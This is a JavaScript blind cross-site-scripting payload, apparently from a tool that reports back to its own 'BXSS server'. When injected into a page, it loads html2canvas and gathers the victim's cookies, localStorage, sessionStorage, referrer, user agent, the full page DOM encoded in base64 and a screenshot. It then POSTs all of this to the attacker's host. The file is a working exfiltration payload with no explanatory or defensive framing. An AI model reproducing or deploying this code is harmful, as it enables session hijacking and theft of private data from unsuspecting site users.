var collected_data = {};

var curScript = document.currentScript;

function return_value(value) {
  return (value !== undefined) ? value : ""
}

function screenshot() {
  return new Promise(function (resolve, reject) {
    html2canvas(document.querySelector("html"), { letterRendering: 1, allowTaint: true, useCORS: true}).then(function (canvas) {
        resolve(return_value(canvas.toDataURL())) // png in dataURL format
    });
  });
}


function collect_data() {
  return new Promise(function (resolve, reject) {
    collected_data["cookies"] = collected_data["location"] = collected_data["referrer"] = collected_data["user_agent"] = collected_data["browser_time"] = collected_data["origin"] = collected_data["dom_base64"] = collected_data["localStorage"] = collected_data["sessionStorage"] = collected_data["screenshot"] = "";

    try { collected_data["location"] = return_value(location.toString()) } catch(e) {}
    try { collected_data["cookies"] = return_value(document.cookie) } catch(e) {}
    try { collected_data["referrer"] = return_value(document.referrer) } catch(e) {}
    try { collected_data["user_agent"] = return_value(navigator.userAgent); } catch(e) {}
    try { collected_data["browser_time"] = return_value(new Date().toTimeString()); } catch(e) {}
    try { collected_data["origin"] = return_value(location.origin); } catch(e) {}
    try { collected_data["dom_base64"] = btoa(unescape(encodeURIComponent(return_value(document.documentElement.outerHTML)))); } catch(e) {console.log(e)}
    try { collected_data["localStorage"] = return_value(localStorage); } catch(e) {}
    try { collected_data["sessionStorage"] = return_value(sessionStorage); } catch(e) {}
    try { 
      screenshot().then(function(img) {
        collected_data["screenshot"] = img
        resolve(collected_data)
      });
    } catch(e) {
      resolve(collected_data)
    }
  });
}


function exfiltrate_loot() {
  // Get the URI of our BXSS server
  var uri = new URL(curScript.src);
  var exf_url = uri.origin + "/c"
  
  var xhr = new XMLHttpRequest()
  xhr.open("POST", exf_url, true)
  xhr.setRequestHeader("Content-Type", "application/json")
  xhr.send(JSON.stringify(collected_data))
}

(function(d, script) {
    script = d.createElement('script');
    script.type = 'text/javascript';
    script.async = true;
    script.onload = function(){
        // remote script has loaded
        collect_data().then(function() {
          exfiltrate_loot();
        });
    };
    script.src = "https://cdnjs.cloudflare.com/ajax/libs/html2canvas/1.4.1/html2canvas.min.js";
    d.getElementsByTagName('head')[0].appendChild(script);
}(document));